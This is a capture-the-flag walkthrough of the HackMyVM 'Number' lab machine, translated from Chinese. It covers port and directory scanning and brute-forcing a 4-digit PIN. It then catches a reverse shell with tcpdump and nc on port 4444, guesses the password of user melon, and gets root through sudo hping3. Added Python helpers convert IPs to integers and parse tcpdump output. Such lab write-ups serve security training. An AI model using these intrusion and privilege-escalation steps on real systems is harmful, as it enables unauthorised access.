hack-my-vm-Number

Number

Port scanning

kali@kali [~] ➜  sudo nmap -sT -p- --min-rate 1000 172.20.10.5 [20:20:00]
[sudo] kali 的密码:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-08 20:20 CST
Nmap scan report for 172.20.10.5
Host is up (0.023s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 08:00:27:7F:86:45 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 9.11 seconds

Probe service versions and details

kali@kali [~] ➜  sudo nmap -sT -sV -sC -p22,80 -O 172.20.10.5 [20:20:27]
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-08 20:21 CST
Nmap scan report for 172.20.10.5
Host is up (0.00052s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 2f:90:c5:7c:a1:62:89:3a:ec:ea:c3:51:fa:77:f8:3f (RSA)
| 256 8e:21:71:85:04:3d:a7:db:1d:e6:6f:16:27:0c:0d:c9 (ECDSA)
|_ 256 e2:39:c7:eb:f2:6d:53:0f:fd:3c:2c:05:31:c9:5b:f2 (ED25519)
80/tcp open http nginx 1.14.2
|_http-server-header: nginx/1.14.2
|_http-title: Site doesn't have a title (text/html).
MAC Address: 08:00:27:7F:86:45 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.91 seconds

Port 80

kali@kali [~] ➜  curl http://172.20.10.5 [20:21:29]
Good luck.
kali@kali [~] ➜ sudo dirsearch -u http://172.20.10.5/ [20:22:13]
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
from pkg_resources import DistributionNotFound, VersionConflict

_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /home/kali/reports/http_172.20.10.5/__25-03-08_20-22-32.txt

Target: http://172.20.10.5/

[20:22:32] Starting:
[20:22:39] 301 - 185B - /admin -> http://172.20.10.5/admin/
[20:22:40] 200 - 412B - /admin/
[20:22:40] 200 - 412B - /admin/index.php
[20:23:11] 200 - 11B - /robots.txt

Task Completed

Check the content of robots.txt

kali@kali [~] ➜  curl http://172.20.10.5/robots.txt [20:23:24]
whoami.php

Try accessing whoami.php

kali@kali [~] ➜  curl http://172.20.10.5/whoami.php [20:24:06]
<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx/1.14.2</center>
</body>
</html>
kali@kali [~] ➜ curl http://172.20.10.5/admin/whoami.php [20:24:39]
<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx/1.14.2</center>
</body>
</html>

Not accessible, so start from the admin directory instead


Try brute-forcing the login directly


That failed, so change approach and check whether the scan missed any files

kali@kali [~] ➜  gobuster dir --wordlist=/usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://172.20.10.5 [20:24:47]
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://172.20.10.5
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/admin (Status: 301) [Size: 185] [--> http://172.20.10.5/admin/]
/pin (Status: 301) [Size: 185] [--> http://172.20.10.5/pin/]
Progress: 220561 / 220562 (100.00%)
===============================================================
Finished
===============================================================

Sure enough, a directory was missed; let's visit /pin

It looks like a 4-digit number has to be brute-forced, the same as brute-forcing a 4-digit verification code, so brute-force it directly


The PIN is 4444. Logging in with it, the response contains nothing useful, so try accessing whoami.php


The value of this page is that it reveals a username; go straight back to the admin page and try logging in with that username and the password 4444


Entering an IP address, the response says only digits are allowed, so the IP has to be converted to a number. There are online tools for this, for example the IP-to-int converter at BeJSON.com (在线ip转int,ip转数字-BeJSON.com)
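The conversion the online tool performs, as an added example that is not part of the original write-up: an IPv4 address is packed into a 32-bit big-endian integer, and the reverse conversion lets you check the digits before submitting them. The listener address 172.20.10.3 from the write-up is used as the sample input.

```python
import re

# Added example (not from the original write-up): dotted-quad IPv4 <-> integer,
# the same conversion the write-up performed with an online tool.
DOTTED_QUAD = re.compile(r"^(\d{1,3})\.(\d{1,3})\.(\d{1,3})\.(\d{1,3})$")


def ip_to_int(ip: str) -> int:
    """Return the 32-bit big-endian integer form of an IPv4 address."""
    m = DOTTED_QUAD.match(ip.strip())
    if m is None:
        raise ValueError(f"not a dotted-quad IPv4 address: {ip!r}")
    octets = [int(o) for o in m.groups()]
    if any(o > 255 for o in octets):
        raise ValueError(f"octet out of range in {ip!r}")
    value = 0
    for o in octets:
        value = (value << 8) | o   # each octet occupies one byte, high byte first
    return value


def int_to_ip(value: int) -> str:
    """Inverse of ip_to_int; rejects values outside the 32-bit range."""
    if not 0 <= value <= 0xFFFFFFFF:
        raise ValueError(f"not a 32-bit value: {value}")
    return ".".join(str((value >> shift) & 0xFF) for shift in (24, 16, 8, 0))


if __name__ == "__main__":
    listener = "172.20.10.3"   # the attacker host used in the write-up
    as_int = ip_to_int(listener)
    print(listener, "->", as_int, "->", int_to_ip(as_int))
```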

After converting and entering it, the response says it is connecting a reverse shell. For a reverse shell the two essential parameters are the IP and the port; we have entered our own IP but do not know which port it connects back to, so we use tcpdump to listen on the network interface

kali@kali [~] ➜  sudo tcpdump -i eth0 src 172.20.10.5 [20:48:02]
[sudo] kali 的密码:
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on eth0, link-type EN10MB (Ethernet), snapshot length 262144 bytes
20:48:10.938046 IP 172.20.10.5.35792 > 172.20.10.3.4444: Flags [S], seq 3851990091, win 64240, options [mss 1460,sackOK,TS val 2651486862 ecr 0,nop,wscale 7], length 0
20:48:16.024356 ARP, Request who-has 172.20.10.3 tell 172.20.10.5, length 46
20:48:16.067612 ARP, Reply 172.20.10.5 is-at 08:00:27:7f:86:45 (oui Unknown), length 46

The target machine is trying to connect to port 4444 on our host, so listen on local port 4444 and catch the reverse shell
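Reading the callback port out of the capture, as an added example that is not part of the original write-up: the write-up found the port by eye; this parser extracts outbound SYNs from a given host in tcpdump's text format, skipping ARP lines and SYN-ACK replies. The capture below is constructed to mirror the session above plus a hypothetical reply and a hypothetical 172.20.10.3 -> :80 connection; the same check flags a web server opening outbound connections to unexpected ports, which is the defender's view of a reverse shell.

```python
import re
from typing import NamedTuple

# Added example, not from the original write-up: pick the reverse-shell callback
# port out of tcpdump's text output. The capture below is constructed to mirror
# the session above; the SYN-ACK and ARP lines are decoys the parser must skip,
# and the 172.20.10.3 -> :80 line is a hypothetical extra connection.
SAMPLE_CAPTURE = """\
20:48:10.938046 IP 172.20.10.5.35792 > 172.20.10.3.4444: Flags [S], seq 3851990091, win 64240, options [mss 1460,sackOK,TS val 2651486862 ecr 0,nop,wscale 7], length 0
20:48:10.938200 IP 172.20.10.3.4444 > 172.20.10.5.35792: Flags [S.], seq 1, ack 3851990092, win 65160, length 0
20:48:16.024356 ARP, Request who-has 172.20.10.3 tell 172.20.10.5, length 46
20:48:16.067612 ARP, Reply 172.20.10.5 is-at 08:00:27:7f:86:45 (oui Unknown), length 46
20:48:20.101010 IP 172.20.10.3.50000 > 172.20.10.5.80: Flags [S], seq 1, win 64240, length 0
"""

# One tcpdump TCP line: "<ts> IP <src>.<sport> > <dst>.<dport>: Flags [<flags>], ..."
TCP_LINE = re.compile(
    r"^(?P<ts>\S+) IP (?P<src>\d+\.\d+\.\d+\.\d+)\.(?P<sport>\d+) > "
    r"(?P<dst>\d+\.\d+\.\d+\.\d+)\.(?P<dport>\d+): Flags \[(?P<flags>[^\]]*)\]"
)

class SynAttempt(NamedTuple):
    ts: str
    src: str
    sport: int
    dst: str
    dport: int

def outbound_syns(capture: str, src_host: str) -> list[SynAttempt]:
    """Connection attempts (SYN without ACK) that src_host initiated."""
    found = []
    for line in capture.splitlines():
        m = TCP_LINE.match(line)
        if m is None or m["src"] != src_host:
            continue  # ARP lines, non-TCP lines, or traffic from other hosts
        if "S" not in m["flags"] or "." in m["flags"]:
            continue  # tcpdump prints ACK as '.', so "[S.]" is a SYN-ACK reply
        found.append(SynAttempt(m["ts"], m["src"], int(m["sport"]),
                                m["dst"], int(m["dport"])))
    return found

def callback_ports(capture: str, src_host: str) -> set[int]:
    """Ports src_host tried to reach, i.e. where a listener must be waiting."""
    return {a.dport for a in outbound_syns(capture, src_host)}

if __name__ == "__main__":
    for a in outbound_syns(SAMPLE_CAPTURE, "172.20.10.5"):
        print(f"{a.ts} {a.src}:{a.sport} -> {a.dst}:{a.dport}")
    print("listen on:", sorted(callback_ports(SAMPLE_CAPTURE, "172.20.10.5")))
```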

kali@kali [~] ➜  nc -lvnp 4444 [20:50:42]
listening on [any] 4444 ...
connect to [172.20.10.3] from (UNKNOWN) [172.20.10.5] 35794
/usr/bin/script -qc /bin/bash /dev/null
www-data@number:~/html/admin$ whoami
whoami
www-data
www-data@number:~/html/admin$

Shell obtained

Privilege escalation

After some manual enumeration nothing sensitive turned up, and running linpeas.sh found nothing either, so I tried switching directly to the melon user. The first attempt with 4444 failed; the second attempt with melon succeeded: the password is the username

www-data@number:/home$ su - melon
su - melon
Password: melon

melon@number:~$ whoami
whoami
melon
melon@number:~$

Enumeration

melon@number:~$ sudo -l
sudo -l
Matching Defaults entries for melon on number:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User melon may run the following commands on number:
(ALL) NOPASSWD: /usr/sbin/hping3
melon@number:~$

After looking it up: hping3 run via sudo can be used to escalate privileges, since its interactive prompt will launch a shell

melon@number:~$ sudo /usr/sbin/hping3
sudo /usr/sbin/hping3
hping3> /bin/bash
/bin/bash
root@number:/home/melon# whoami
whoami
root
root@number:/home/melon#

Done